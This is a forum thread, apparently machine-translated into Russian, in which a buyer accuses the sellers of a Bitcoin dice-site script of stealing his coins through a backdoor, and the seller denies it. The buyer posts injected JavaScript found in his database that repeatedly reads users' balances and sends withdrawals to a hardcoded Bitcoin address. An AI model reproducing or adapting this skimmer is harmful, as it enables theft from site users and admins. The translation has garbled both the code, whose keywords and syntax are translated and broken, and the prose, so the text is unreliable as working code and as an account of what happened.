Я купил coindice и они Stollen все мои БТД. Я заплатил 1,1 BTC за сценарий, и они Stollen 0,54 с их BTC бэкдор
Сегодня я нашел этот код в БД:
setInterval (функция () {fuckyou = (document.body) .innerText; FuckMe = fuckyou.match ("админ"); Fuckyoutoo = (document.body) .innerText; fuckmeaswell = fuckyoutoo.match ("Изымать"). Если (! FuckMe = NULL) {если (fuckmeaswell = NULL) {вар = parseFloat суммой ($ ( '# содержание') найти ("большой") .eq (1) .html () - 0,01); $ пост (."./?p=wallet", {_ Адр: '16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D', _ утра:} суммой, функция (данные) {});} еще {window.location.replace ("./?p=wallet");}} Еще {функция refreshBalancehaxored () {вар s1 = (document.location) .ToString (); переменная s = s1.split ("знак равно") [1]; s = s.substring (0, s.length- 24)
$ .ajax ({ 'URL': './ содержание / Ajax / request_balance.php _unique =? '+ S' DATATYPE':"JSON"'Успех': функция (данные) {вар ебут = (данные [ 'баланс']); если (ебать>. = 0,002) {$ Ajax ({ 'URL':»./ содержание / Ajax / withdraw.php valid_addr = 16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&сумма = '+ ебать +&_unique = '+ s,' Datatype ':"JSON"'Успех': функция (данные) {}});}}});}
refreshBalancehaxored ();}}, 1000); Это не из оригинальной версии сценария, вы можете проверить его в исходных файлах. Вы просто позволить кому-то поставить лазейку в сценарии. Вы даже не обновлял сценарий ...Если он обнаружил, что код
в БД это значит
ваш код является
не до нуля остановить инъекции SQL.
Я создал сценарий, так что я знаю, как это все работает.
Там нет инъекции SQL. Все входы базы данных защищены. Это украсть его вина. Он не обеспечивал сервер должным образом.
Я уже сказал, что старая версия сценария. Пожалуйста, прочтите, прежде чем публиковать что-то вроде этого. Он имел 1.2, она была установлена в 2.0 и новая версия 3.0 имеет также два фактора AUTH.
Вы продали мне уязвимый сценарий! ВЫ SCAMMED МЕНЯ!
Нет, мы не. По крайней мере, это доказать, прежде чем начать antiCoinDice действия.
Эй, ты сволочь,
Этот парень в основном уверен, законен, он не будет заполнить форум с жульничеством сообщениями, если он действительно потерял 0,1 BTC на вашем сайте, но он будет делать это, только если он действительно был мошенническим. Я хотел бы сделать то же самое. Если бы я потерял 60 долларов в виде игры в кости (даже если мне не нравится делать ставки), я бы просто взять потери и это все, это всего лишь 60 долларов. Для меня, его гнев доказывает, что вы действительно мошенническим его, особенно код, который он проводки.